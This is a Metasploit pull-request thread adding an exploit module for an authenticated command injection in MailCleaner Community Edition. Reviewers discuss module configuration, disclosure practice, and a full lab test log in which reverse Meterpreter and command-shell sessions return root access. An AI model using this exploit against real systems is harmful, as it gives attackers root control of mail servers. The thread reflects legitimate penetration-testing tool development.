Adding Module MailCleaner Remote Code Execution Module

[mdisec]

Hi fellas 🎉

This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use use exploit/linux/http/mailcleaner
• Set RHOST
• Set LHOST
• Set USERNAME
• Set PASSWORD
• Run exploit
• Verify that you are seeing Awesome..! Authenticated.
• Verify that you are getting meterpreter session.

Technical Details and MSF Module in Asciinema
https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/

[wvu]

Hi, @mmetince! Welcome back. :P

[jmartin-tech]

Looks like latest update made msftidy sad. Only the warning about newline is required.

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/linux/http/mailcleaner_exec.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/linux/http/mailcleaner_exec.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------

[wvu]

@mmetince: It sounds like you're in @jrobles-r7's very capable hands now. Thanks!

[todb-r7]

Hi @mmetince -- I'm assuming there hasn't been any coordinated vuln disclosure (CVD) on this, so I'm going to clue the vendor in and see about securing a CVE from DWF at https://iwantacve.org/ (since it's open source software), using this PR as a reference. Cool with you, I assume?

In the future, if you'd like to play along with CVD and maybe /not/ drop 0day on unsuspecting users, I would be happy to help disclose this stuff on your behalf per Rapid7's disclosure policy. Your bug, your choice, of course, but limiting surprises like this is usually more neighborly. :)

[mdisec]

Hi @todb-r7, it's cool ofc.

I fully understand what you are saying. I would like to share my thoughts regarding the 0day disclosure case like this one.

Every single one of my research is like; focus on technical details, find 0day, prepare write-up and msf modules and then report it to the vendor. When the vulnerability requires an authentication and vendor didn't rapidly response, I go with full disclosure because I don't want to go back to the project after couple of weeks/months. It's like waste of time when you try to remember all the technical stuff that you've done before (product installation steps etc etc, msf landing process which requires lots of changes, thanks to pple @wvu-r7 🙏).

Cheers,

[jrobles-r7]

Move to the target with python

Suggested change

'Payload' => 'python/meterpreter/reverse_tcp'

[jrobles-r7]

Each target specifies its platform. This can be removed.

Suggested change

'Platform' => ['unix'],

[wvu]

I would add all the platforms to the top-level Platform. Same for Arch. Otherwise they won't display in info. Someone can fix that if they want.

[wvu]

msf5 exploit(linux/http/mailcleaner_exec) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/mailcleaner_exec.rb b/modules/exploits/linux/http/mailcleaner_exec.rb
index 361cbeab8a..cf92c85b10 100644
--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5,
           'Payload'  => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['unix'],
-      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      #'Platform'       => ['unix'],
+      #'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
       'Targets'        =>
         [
           [
msf5 exploit(linux/http/mailcleaner_exec) > info
[snip]
   Platform:
       Arch:
[snip]
msf5 exploit(linux/http/mailcleaner_exec) >

[mdisec]

It is okay to leave 'targets' section as it and add all the platforms to the top-level platforms like something as follow ?

      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],

[mdisec]

ping

[wchen-r7]

pong!

I believe Jacob is actively working on this PR, so no worries, this will be landed :-)

[jrobles-r7]

Tested on MailCleaner Community Edition

msf5 > use exploit/linux/http/mailcleaner_exec
msf5 exploit(linux/http/mailcleaner_exec) > set username admin
username => admin
msf5 exploit(linux/http/mailcleaner_exec) > set password MCPassw0rd
password => MCPassw0rd
msf5 exploit(linux/http/mailcleaner_exec) > set rhosts 172.22.222.132
rhosts => 172.22.222.132
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 172.22.222.132
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.132:49783) at 2019-01-08 13:01:38 -0600

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : mailcleaner
OS              : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.132 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/mailcleaner_exec) > set target 1
target => 1
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Command shell session 3 opened (172.22.222.136:4444 -> 172.22.222.132:49789) at 2019-01-08 13:02:00 -0600

whoami
root
uname -a      
Linux mailcleaner 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13) x86_64 GNU/Linux
^C
Abort session 3? [y/N]  y

[jrobles-r7]

Release Notes

The mailcleaner_exec exploit module has been added to the framework. This exploits an authenticated command injection vulnerability in the MailCleaner Community Edition product.